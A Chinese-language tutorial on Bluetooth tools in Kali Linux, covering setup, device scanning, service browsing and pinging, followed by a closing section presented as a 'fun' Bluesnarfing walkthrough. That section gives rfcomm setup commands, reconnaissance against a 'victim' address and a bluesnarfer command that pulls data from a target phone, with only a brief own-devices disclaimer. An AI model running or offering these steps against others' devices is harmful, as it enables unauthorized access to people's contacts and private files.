Kali linux的蓝牙使用
这是一次有意思的基础使用指南
目录
开启与使用
打开终端并输入以下命令以查看是否已安装蓝牙工具和服务:
sudo apt-get update
sudo apt-get install bluetooth bluez bluez-tools rfkill
启用蓝牙服务:
sudo systemctl start bluetooth
设置蓝牙服务开机自启:
sudo systemctl enable bluetooth
如果蓝牙已被禁用,可以使用以下命令启用蓝牙:
sudo rfkill unblock bluetooth
可以使用以下命令来扫描并连接蓝牙设备:
sudo hcitool scan
当然也可以使用命令台使用bluetoothctl
命令
使用scan on
查看附近已经打开的蓝牙设备
连接与查看信息
使用以下命令连接设备
connect xx:xx:xx:xx:xx:xx
或
sudo bluez-simple-agent hci0 XX:XX:XX:XX:XX:XX
此处xx:xx:xx:xx:xx:xx是硬件地址
查看信息
在使用第一个命令时可以使用以下命令查看信息
info xx:xx:xx:xx:xx:xx
这里推荐一个工具hciconfig
首先,让我们在终端使用hciconfig确认我们的蓝牙适配器已打开并可识别:
hciconfig
命令的结果将类似于以下:
hci0: Type: Primary Bus: USB
BD Address: XX:3X:4X:5X:1X:6X ACL MTU: 1021:8 SCO MTU: 255:16
UP RUNNING
RX bytes:905069 acl:112 sco:0 events:125656 errors:0
TX bytes:76277994 acl:123862 sco:0 commands:1283 errors:0
启动并启用蓝牙适配器,以便通过发出以下命令确保它已启动并准备好使用:
hciconfig hci0
首先使用此工具的扫描部分来查找发送发现信标的蓝牙设备(在发现模式下):
hcitool scan
您可以使用inq命令查询这些设备。您可以这样使用命令:
hcitool inq
这将显示不同类型的信息,包括通知我们正在扫描的设备类型的类别信息。
使用服务发现协议(SDP)在设备上搜索服务。BlueZ 包括一个名为sdptool的工具,该工具能够浏览设备提供的服务。我们可以通过键入以下内容来使用它:
sdptool browse <MAC Address>
使用附近所有设备的 MAC 地址,我们可以 ping 它们,无论它们是否处于查找模式,以查看它们是否在可访问范围内:
l2ping <MAC address>
这表示 MAC 地址为76:6F:46:65:72:67的设备在范围内且可访问。
下面是一些好玩的操作:
Bluesnarfing
Bluesnarfing 可用于访问薄弱防护的设备。简而言之,Bluesnarfing 是指通过蓝牙连接(通常在手机、笔记本电脑和类似类型的设备之间)对设备进行未经授权的访问,在某些手机上用户甚至可以复制图片和私人视频。
蓝牙使用 48 位唯一 MAC 地址,其中前 24 位是制造商通用的。剩下的 24 位大约有 1680 万个可能的组合,所以别耽误自己的时间。
准备
要开始工作,您需要准备好以下各项:
既然安装了 Bluesnarfer,请配置rfcomm:
mkdir -p /dev/bluetooth/rfcomm
mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0
mknod --mode=666 /dev/rfcomm0 c 216 0
hciconfig -i hci0 up
hciconfig hci0
扫描潜在的设备:
hcitool scan hci0
Ping 以查看设备是否在附近:
l2ping < victim mac addr>
浏览设备的rfcomm频道以连接:
sdptool browse --tree --l2cap < mac addr >
现在 Bluesnarfer 已经成立。现在,您可以进行一些有趣的操作:
Bluesnarfer -r 1-100 -C 7 -b < mac addr >
备注
该有趣玩法请您仅对自己的设备进行操作,对此造成的影响与本人无关,请将技术用于正途!